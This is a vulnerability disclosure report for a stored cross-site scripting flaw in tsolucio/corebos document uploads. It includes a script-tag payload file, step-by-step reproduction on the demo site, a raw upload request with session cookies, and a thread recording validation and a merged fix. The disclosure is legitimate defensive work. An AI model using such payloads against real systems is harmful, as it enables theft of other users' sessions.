Stored XSS via upload file in tsolucio/corebos

Valid

Reported on

Mar 23rd 2022


Description

In document feature, you can upload a file .ofd which can have xss

Proof of Concept

// xss.ofd
<script>alert(1)</script>

Step 1: Go to Support -> Documents

Step 2: Click Create Documents

Step 3: At the Download type, choose Internal. Upload file xss.ofd above.

Step 4: Go to that file link, such as: https://demo.corebos.com/storage/2022/March/week4/43911_xss.ofd. You will see alert here.

Request:

POST /index.php HTTP/2

Host: demo.corebos.com

Cookie: democoreboscom=792a9ee53093e76746fd348bc7a03e33; ck_login_id_vtiger=7; timezone=0; corebos_browsertabID=9866295214548453 Content-Length: 4287

Cache-Control: max-age=0

Upgrade-Insecure-Requests: 1

Origin: https://demo.corebos.com

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryN1dAzo74J4FoIATI

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.9

Referer: https://demo.corebos.com/index.php?module=Documents&action=EditView&return_action=DetailView

Connection: close

…………………………………………………………….

------WebKitFormBoundaryN1dAzo74J4FoIATI

Content-Disposition: form-data; name="filename"; filename="xss.ofd"

Content-Type: application/octet-stream

<script>alert(1)</script>

------WebKitFormBoundaryN1dAzo74J4FoIATI

Content-Disposition: form-data; name="filename_hidden"

xss.ofd

…………………………………………………………….

Impact

An user can upload a poison file and share that link to another user to steal their cookie,...

We are processing your report and will contact the tsolucio/corebos team within 24 hours. 4 months ago
lekhang123lc modified the report
4 months ago
lekhang123lc modified the report
4 months ago
lekhang123lc modified the report
4 months ago
We have contacted a member of the tsolucio/corebos team and are waiting to hear back 4 months ago
We have sent a follow up to the tsolucio/corebos team. We will try again in 7 days. 4 months ago
We have sent a second follow up to the tsolucio/corebos team. We will try again in 10 days. 4 months ago
We have sent a third and final follow up to the tsolucio/corebos team. This report is now considered stale. 4 months ago
Joe Bordes validated this vulnerability a month ago
lekhang123lc has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Joe Bordes
a month ago

Maintainer


@admin I can't mark this one as fixed, the button is deactivated

Jamie Slome
a month ago

Admin


@joebordes - apologies for this. This looks like a bug on the platform. We have identified the cause, and are rolling back. You should be able to confirm the fix in about 15 minutes 👍

Joe Bordes confirmed that a fix has been merged on fcf8fa a month ago
Joe Bordes has been awarded the fix bounty
to join this conversation